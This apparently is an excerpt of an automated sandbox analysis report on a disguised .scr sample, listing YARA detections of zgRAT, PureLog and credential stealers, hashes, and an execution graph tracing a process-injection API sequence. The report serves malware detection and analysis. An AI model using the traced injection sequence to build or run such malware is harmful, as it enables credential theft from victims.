                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:16:16:50
                                                                                                                                                  Start date:19/04/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"
                                                                                                                                                  Imagebase:0x80000
                                                                                                                                                  File size:37'688 bytes
                                                                                                                                                  MD5 hash:F99DC4D2E045AE0BBC169FFF12A5C6D5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.419873303.0000000000640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.432614615.0000000004CF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:16:17:01
                                                                                                                                                  Start date:19/04/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Kbojz.exe"
                                                                                                                                                  Imagebase:0x800000
                                                                                                                                                  File size:37'688 bytes
                                                                                                                                                  MD5 hash:F99DC4D2E045AE0BBC169FFF12A5C6D5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.410066207.000000000392F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.410066207.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 64%, ReversingLabs
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:16:17:11
                                                                                                                                                  Start date:19/04/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Kbojz.exe"
                                                                                                                                                  Imagebase:0x800000
                                                                                                                                                  File size:37'688 bytes
                                                                                                                                                  MD5 hash:F99DC4D2E045AE0BBC169FFF12A5C6D5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:16:17:14
                                                                                                                                                  Start date:19/04/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Kbojz.exe"
                                                                                                                                                  Imagebase:0x800000
                                                                                                                                                  File size:37'688 bytes
                                                                                                                                                  MD5 hash:F99DC4D2E045AE0BBC169FFF12A5C6D5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.472630617.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:16:17:18
                                                                                                                                                  Start date:19/04/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Kbojz.exe"
                                                                                                                                                  Imagebase:0x800000
                                                                                                                                                  File size:37'688 bytes
                                                                                                                                                  MD5 hash:F99DC4D2E045AE0BBC169FFF12A5C6D5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:8.1%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:135
                                                                                                                                                    Total number of Limit Nodes:6
                                                                                                                                                    execution_graph 63646 15d044 63647 15d05c 63646->63647 63648 15d0b7 63647->63648 63650 4c8e1a0 63647->63650 63651 4c8e1f9 63650->63651 63654 4c8e730 63651->63654 63652 4c8e22e 63655 4c8e75d 63654->63655 63658 4c8e8f3 63655->63658 63659 4c8d5b8 63655->63659 63658->63652 63661 4c8d5df 63659->63661 63663 4c8dab8 63661->63663 63664 4c8db01 VirtualProtect 63663->63664 63666 4c8d69c 63664->63666 63666->63652 63667 46a753b 63668 46a7545 63667->63668 63671 1f007e8 63668->63671 63669 46a6ebf 63672 1f007fd 63671->63672 63673 1f00813 63672->63673 63676 1f00828 63672->63676 63680 1f00a48 63672->63680 63673->63669 63678 1f00852 63676->63678 63677 1f00897 63677->63673 63678->63677 63684 1f021e1 63678->63684 63682 1f00885 63680->63682 63681 1f00897 63681->63673 63682->63681 63683 1f021e1 8 API calls 63682->63683 63683->63682 63685 1f021f5 63684->63685 63688 1f02475 63685->63688 63689 1f02c49 63688->63689 63691 1f02290 63688->63691 63693 1f02f90 63689->63693 63690 1f02c7d 63694 1f02fa5 63693->63694 63707 1f02fc7 63694->63707 63708 1f0353b 63694->63708 63712 1f03572 63694->63712 63716 1f035ef 63694->63716 63721 1f03c4b 63694->63721 63726 1f03da7 63694->63726 63732 1f03a24 63694->63732 63736 1f034a4 63694->63736 63742 1f03623 63694->63742 63746 1f038c1 63694->63746 63750 1f0349f 63694->63750 63754 1f03cbf 63694->63754 63759 1f0343c 63694->63759 63707->63690 63709 1f03545 63708->63709 63764 1f07bf8 63709->63764 63713 1f03944 63712->63713 63714 1f03051 63712->63714 63768 1f09c50 63713->63768 63717 1f03fb6 63716->63717 63776 1f07eb0 63717->63776 63780 1f07eb8 63717->63780 63718 1f03ff0 63718->63707 63722 1f03c55 63721->63722 63723 1f03051 63722->63723 63784 1f08250 63722->63784 63788 1f08249 63722->63788 63727 1f03f90 63726->63727 63728 1f03051 63726->63728 63730 1f07eb0 WriteProcessMemory 63727->63730 63731 1f07eb8 WriteProcessMemory 63727->63731 63729 1f03ff0 63729->63707 63730->63729 63731->63729 63733 1f03a2f 63732->63733 63735 1f07bf8 VirtualAllocEx 63733->63735 63734 1f03a8e 63735->63734 63737 1f034b1 63736->63737 63739 1f03051 63737->63739 63740 1f07eb0 WriteProcessMemory 63737->63740 63741 1f07eb8 WriteProcessMemory 63737->63741 63738 1f03ff0 63738->63707 63740->63738 63741->63738 63743 1f03629 63742->63743 63792 1f09bc0 63743->63792 63747 1f038d9 63746->63747 63797 1f045f0 63747->63797 63748 1f03051 63751 1f03a56 63750->63751 63753 1f07bf8 VirtualAllocEx 63751->63753 63752 1f03a8e 63753->63752 63755 1f03c71 63754->63755 63756 1f03051 63754->63756 63755->63754 63757 1f08250 ResumeThread 63755->63757 63758 1f08249 ResumeThread 63755->63758 63757->63755 63758->63755 63760 1f0344b 63759->63760 63762 1f07eb0 WriteProcessMemory 63760->63762 63763 1f07eb8 WriteProcessMemory 63760->63763 63761 1f03475 63762->63761 63763->63761 63765 1f07c3c VirtualAllocEx 63764->63765 63767 1f03a8e 63765->63767 63769 1f09c65 63768->63769 63772 1f07578 63769->63772 63773 1f075c1 Wow64SetThreadContext 63772->63773 63775 1f07639 63773->63775 63775->63714 63777 1f07f01 WriteProcessMemory 63776->63777 63779 1f07f9a 63777->63779 63779->63718 63781 1f07f01 WriteProcessMemory 63780->63781 63783 1f07f9a 63781->63783 63783->63718 63785 1f08294 ResumeThread 63784->63785 63787 1f082e0 63785->63787 63787->63722 63789 1f08294 ResumeThread 63788->63789 63791 1f082e0 63789->63791 63791->63722 63793 1f09bd5 63792->63793 63795 1f07eb0 WriteProcessMemory 63793->63795 63796 1f07eb8 WriteProcessMemory 63793->63796 63794 1f03669 63795->63794 63796->63794 63798 1f04607 63797->63798 63799 1f04629 63798->63799 63802 1f04a26 63798->63802 63807 1f049cd 63798->63807 63799->63748 63803 1f04a4b 63802->63803 63812 1f071c8 63803->63812 63816 1f071bc 63803->63816 63808 1f049d6 63807->63808 63810 1f071c8 CreateProcessA 63808->63810 63811 1f071bc CreateProcessA 63808->63811 63809 1f046e9 63810->63809 63811->63809 63813 1f07248 CreateProcessA 63812->63813 63815 1f07444 63813->63815 63817 1f07248 CreateProcessA 63816->63817 63819 1f07444 63817->63819 63820 4ce528 63821 4ce542 63820->63821 63823 4ce552 63821->63823 63825 4c85c5e 63821->63825 63828 4c83c3a 63821->63828 63827 4c8d5b8 VirtualProtect 63825->63827 63826 4c801cb 63827->63826 63830 4c8d5b8 VirtualProtect 63828->63830 63829 4c83c58 63830->63829 63642 4c8ec80 63643 4c8ecc4 VirtualAlloc 63642->63643 63645 4c8ed31 63643->63645
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,p$4$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                                                                                                                    • API String ID: 0-142193208
                                                                                                                                                    • Opcode ID: 7fe4ee81bf2805dc332a61b94445b54b16ae5605a924f3825c27588c6daf29fb
                                                                                                                                                    • Instruction ID: 6464de84b47233b9474314a12ac1c2d7a2e825ee2665750a7902a151e3b3070d
                                                                                                                                                    • Opcode Fuzzy Hash: 7fe4ee81bf2805dc332a61b94445b54b16ae5605a924f3825c27588c6daf29fb
                                                                                                                                                    • Instruction Fuzzy Hash: D1B20774A00618CFDB14DFA9C894BADB7B6BF88700F158199E605AB3A5DB70ED81CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,p$4$$p$$p$$p$$p
                                                                                                                                                    • API String ID: 0-3956653638
                                                                                                                                                    • Opcode ID: f25fafd9756fb51138fe19e2cb10ba81e53b870ba533c42d9af97869fc913b78
                                                                                                                                                    • Instruction ID: 8b96882760784021b4f3c3597b5cc25252b019075c1b111a59a996c2bc540e65
                                                                                                                                                    • Opcode Fuzzy Hash: f25fafd9756fb51138fe19e2cb10ba81e53b870ba533c42d9af97869fc913b78
                                                                                                                                                    • Instruction Fuzzy Hash: 4C221A34A00614CFDB24DFA5C894BADB7B6FF88704F148199D609AB3A5EB70AD91CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1025 4ce8e0-4ce901 1026 4ce908-4ce9ef 1025->1026 1027 4ce903 1025->1027 1029 4ce9f5-4ceb36 1026->1029 1030 4cf0f1-4cf119 1026->1030 1027->1026 1074 4ceb3c-4ceb97 1029->1074 1075 4cf0ba-4cf0e4 1029->1075 1033 4cf81f-4cf828 1030->1033 1035 4cf82e-4cf845 1033->1035 1036 4cf127-4cf131 1033->1036 1037 4cf138-4cf22c 1036->1037 1038 4cf133 1036->1038 1057 4cf22e-4cf23a 1037->1057 1058 4cf256 1037->1058 1038->1037 1060 4cf23c-4cf242 1057->1060 1061 4cf244-4cf24a 1057->1061 1059 4cf25c-4cf27c 1058->1059 1065 4cf2dc-4cf35c 1059->1065 1066 4cf27e-4cf2d7 1059->1066 1063 4cf254 1060->1063 1061->1063 1063->1059 1088 4cf35e-4cf3b1 1065->1088 1089 4cf3b3-4cf3f6 1065->1089 1079 4cf81c 1066->1079 1082 4ceb9c-4ceba7 1074->1082 1083 4ceb99 1074->1083 1085 4cf0ee 1075->1085 1086 4cf0e6 1075->1086 1079->1033 1087 4cefcf-4cefd5 1082->1087 1083->1082 1085->1030 1086->1085 1090 4cebac-4cebca 1087->1090 1091 4cefdb-4cf057 1087->1091 1110 4cf401-4cf40a 1088->1110 1089->1110 1092 4cebcc-4cebd0 1090->1092 1093 4cec21-4cec36 1090->1093 1131 4cf0a4-4cf0aa 1091->1131 1092->1093 1098 4cebd2-4cebdd 1092->1098 1096 4cec3d-4cec53 1093->1096 1097 4cec38 1093->1097 1101 4cec5a-4cec71 1096->1101 1102 4cec55 1096->1102 1097->1096 1103 4cec13-4cec19 1098->1103 1105 4cec78-4cec8e 1101->1105 1106 4cec73 1101->1106 1102->1101 1107 4cebdf-4cebe3 1103->1107 1108 4cec1b-4cec1c 1103->1108 1113 4cec95-4cec9c 1105->1113 1114 4cec90 1105->1114 1106->1105 1111 4cebe9-4cec01 1107->1111 1112 4cebe5 1107->1112 1116 4cec9f-4ced0a 1108->1116 1118 4cf46a-4cf479 1110->1118 1119 4cec08-4cec10 1111->1119 1120 4cec03 1111->1120 1112->1111 1113->1116 1114->1113 1121 4ced0c-4ced18 1116->1121 1122 4ced1e-4ceed3 1116->1122 1123 4cf40c-4cf434 1118->1123 1124 4cf47b-4cf503 1118->1124 1119->1103 1120->1119 1121->1122 1129 4ceed5-4ceed9 1122->1129 1130 4cef37-4cef4c 1122->1130 1127 4cf43b-4cf464 1123->1127 1128 4cf436 1123->1128 1159 4cf67c-4cf688 1124->1159 1127->1118 1128->1127 1129->1130 1133 4ceedb-4ceeea 1129->1133 1137 4cef4e 1130->1137 1138 4cef53-4cef74 1130->1138 1135 4cf0ac-4cf0b2 1131->1135 1136 4cf059-4cf0a1 1131->1136 1140 4cef29-4cef2f 1133->1140 1135->1075 1136->1131 1137->1138 1141 4cef7b-4cef9a 1138->1141 1142 4cef76 1138->1142 1146 4ceeec-4ceef0 1140->1146 1147 4cef31-4cef32 1140->1147 1143 4cef9c 1141->1143 1144 4cefa1-4cefc1 1141->1144 1142->1141 1143->1144 1152 4cefc8 1144->1152 1153 4cefc3 1144->1153 1150 4ceefa-4cef1b 1146->1150 1151 4ceef2-4ceef6 1146->1151 1154 4cefcc 1147->1154 1155 4cef1d 1150->1155 1156 4cef22-4cef26 1150->1156 1151->1150 1152->1154 1153->1152 1154->1087 1155->1156 1156->1140 1161 4cf68e-4cf6e9 1159->1161 1162 4cf508-4cf511 1159->1162 1177 4cf6eb-4cf71e 1161->1177 1178 4cf720-4cf74a 1161->1178 1163 4cf51a-4cf670 1162->1163 1164 4cf513 1162->1164 1179 4cf676 1163->1179 1164->1163 1166 4cf5ef-4cf62f 1164->1166 1167 4cf5aa-4cf5ea 1164->1167 1168 4cf565-4cf5a5 1164->1168 1169 4cf520-4cf560 1164->1169 1166->1179 1167->1179 1168->1179 1169->1179 1186 4cf753-4cf7e6 1177->1186 1178->1186 1179->1159 1190 4cf7ed-4cf80d 1186->1190 1190->1079
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p$TJp$Tep$pp$xbp
                                                                                                                                                    • API String ID: 0-1160029363
                                                                                                                                                    • Opcode ID: 415e4d72f62fdd980415dfe7e51fa1437d79bdf78e9d8438aa1b4a0ae672da0c
                                                                                                                                                    • Instruction ID: b6829e5a9558b8c7ce078493efe9bb24e31cef5e998f927d7e53ef32dcc392eb
                                                                                                                                                    • Opcode Fuzzy Hash: 415e4d72f62fdd980415dfe7e51fa1437d79bdf78e9d8438aa1b4a0ae672da0c
                                                                                                                                                    • Instruction Fuzzy Hash: B2A2B575A00228CFDB64CF69C984B99BBB2FF89304F1581E9D509AB325DB359E85CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1734 1f10040-1f1006e 1735 1f10070 1734->1735 1736 1f10075-1f10181 1734->1736 1735->1736 1739 1f10183-1f1019f call 1f1225c 1736->1739 1740 1f101a5-1f101b1 1736->1740 1739->1740 1741 1f101b3 1740->1741 1742 1f101b8-1f101bd 1740->1742 1741->1742 1743 1f101f5-1f10215 1742->1743 1744 1f101bf-1f101cb 1742->1744 1752 1f10217 1743->1752 1753 1f1021c-1f10445 1743->1753 1746 1f101d2-1f101f0 1744->1746 1747 1f101cd 1744->1747 1748 1f11419-1f1141f 1746->1748 1747->1746 1750 1f11421 1748->1750 1751 1f11429 1748->1751 1750->1751 1754 1f1142a 1751->1754 1752->1753 1774 1f10ab2-1f10abe 1753->1774 1754->1754 1775 1f10ac4-1f10afc 1774->1775 1776 1f1044a-1f10456 1774->1776 1784 1f10bd6-1f10bdc 1775->1784 1777 1f10458 1776->1777 1778 1f1045d-1f1051a 1776->1778 1777->1778 1795 1f1053b-1f1058d 1778->1795 1796 1f1051c-1f10535 1778->1796 1786 1f10b01-1f10b7e 1784->1786 1787 1f10be2-1f10c1a 1784->1787 1805 1f10bb1-1f10bd3 1786->1805 1806 1f10b80-1f10b84 1786->1806 1799 1f10f64-1f10f6a 1787->1799 1818 1f1059c-1f105e9 1795->1818 1819 1f1058f-1f10597 1795->1819 1796->1795 1801 1f10f70-1f10fb8 1799->1801 1802 1f10c1f-1f10e21 1799->1802 1812 1f11033-1f1107e 1801->1812 1813 1f10fba-1f1102d 1801->1813 1898 1f10e27-1f10ea7 1802->1898 1899 1f10eac-1f10eb0 1802->1899 1805->1784 1806->1805 1807 1f10b86-1f10bae 1806->1807 1807->1805 1836 1f113e3-1f113e9 1812->1836 1813->1812 1833 1f105f8-1f10645 1818->1833 1834 1f105eb-1f105f3 1818->1834 1821 1f10aa3-1f10aaf 1819->1821 1821->1774 1850 1f10654-1f106a1 1833->1850 1851 1f10647-1f1064f 1833->1851 1834->1821 1838 1f11083-1f110dc 1836->1838 1839 1f113ef-1f11417 1836->1839 1853 1f11104-1f11110 1838->1853 1854 1f110de-1f110f9 1838->1854 1839->1748 1878 1f106b0-1f106fd 1850->1878 1879 1f106a3-1f106ab 1850->1879 1851->1821 1855 1f11112 1853->1855 1856 1f11117-1f11123 1853->1856 1854->1853 1855->1856 1860 1f11125-1f11131 1856->1860 1861 1f11136-1f11145 1856->1861 1863 1f113ca-1f113e0 1860->1863 1864 1f11147 1861->1864 1865 1f1114e-1f113ab 1861->1865 1863->1836 1864->1865 1869 1f112a0-1f11308 1864->1869 1870 1f111c2-1f11211 1864->1870 1871 1f11154-1f111bd 1864->1871 1872 1f11216-1f11256 1864->1872 1873 1f1125b-1f1129b 1864->1873 1893 1f113b6-1f113c2 1865->1893 1900 1f1137c-1f11382 1869->1900 1870->1893 1871->1893 1872->1893 1873->1893 1906 1f1070c-1f10759 1878->1906 1907 1f106ff-1f10707 1878->1907 1879->1821 1893->1863 1917 1f10f4b-1f10f61 1898->1917 1901 1f10eb2-1f10f0b 1899->1901 1902 1f10f0d-1f10f4a 1899->1902 1903 1f11384-1f1138e 1900->1903 1904 1f1130a-1f11368 1900->1904 1901->1917 1902->1917 1903->1893 1919 1f1136a 1904->1919 1920 1f1136f-1f11379 1904->1920 1925 1f10768-1f107b5 1906->1925 1926 1f1075b-1f10763 1906->1926 1907->1821 1917->1799 1919->1920 1920->1900 1930 1f107c4-1f10811 1925->1930 1931 1f107b7-1f107bf 1925->1931 1926->1821 1935 1f10820-1f1086d 1930->1935 1936 1f10813-1f1081b 1930->1936 1931->1821 1940 1f1087c-1f108c9 1935->1940 1941 1f1086f-1f10877 1935->1941 1936->1821 1945 1f108d8-1f10925 1940->1945 1946 1f108cb-1f108d3 1940->1946 1941->1821 1950 1f10934-1f10981 1945->1950 1951 1f10927-1f1092f 1945->1951 1946->1821 1955 1f10990-1f109dd 1950->1955 1956 1f10983-1f1098b 1950->1956 1951->1821 1960 1f109ec-1f10a39 1955->1960 1961 1f109df-1f109e7 1955->1961 1956->1821 1965 1f10a45-1f10a92 1960->1965 1966 1f10a3b-1f10a43 1960->1966 1961->1821 1970 1f10a94-1f10a9c 1965->1970 1971 1f10a9e-1f10aa0 1965->1971 1966->1821 1970->1821 1971->1821
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 2$$p
                                                                                                                                                    • API String ID: 0-255402429
                                                                                                                                                    • Opcode ID: 9812dda23362cd56f92aa3561064fa6d38fb0ef2ac58efba1cf01e769d8f9577
                                                                                                                                                    • Instruction ID: a0cf23853d75e36bc0f54ac542f97f13f99a39d6b5c53253f14b53be0232dcb8
                                                                                                                                                    • Opcode Fuzzy Hash: 9812dda23362cd56f92aa3561064fa6d38fb0ef2ac58efba1cf01e769d8f9577
                                                                                                                                                    • Instruction Fuzzy Hash: 24C292B4E01228CFDB65DF69C994B9DBBB5BB88300F1081E9D509AB359DB319E85CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Dp
                                                                                                                                                    • API String ID: 0-2141643023
                                                                                                                                                    • Opcode ID: d05c75df160265b353d7403b7710695d5eb5600ae4f42be43dd4ca5425b72d03
                                                                                                                                                    • Instruction ID: cc57f774265c33b3d1444e4eeed93828b487d90afdc3e9c145f58c32ebddde32
                                                                                                                                                    • Opcode Fuzzy Hash: d05c75df160265b353d7403b7710695d5eb5600ae4f42be43dd4ca5425b72d03
                                                                                                                                                    • Instruction Fuzzy Hash: CDD1BF74A01258CFDB54DFA9D994BADBBB2FF88300F1081A9D409AB365DB35AD81CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Tep
                                                                                                                                                    • API String ID: 0-914316021
                                                                                                                                                    • Opcode ID: 49292f6c21162b1dadf287f6cea79c0d03d8ea7116e70e317b4187e5f6676f7d
                                                                                                                                                    • Instruction ID: 031d144615c71f8501753e1b3a71a0dcc1d52b7649d74f4baf1cecbcc121014f
                                                                                                                                                    • Opcode Fuzzy Hash: 49292f6c21162b1dadf287f6cea79c0d03d8ea7116e70e317b4187e5f6676f7d
                                                                                                                                                    • Instruction Fuzzy Hash: 70B1E670E04A18CFDB14EFA9D944BADBBF2FB89300F1491A9D409AB255E7746D96CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
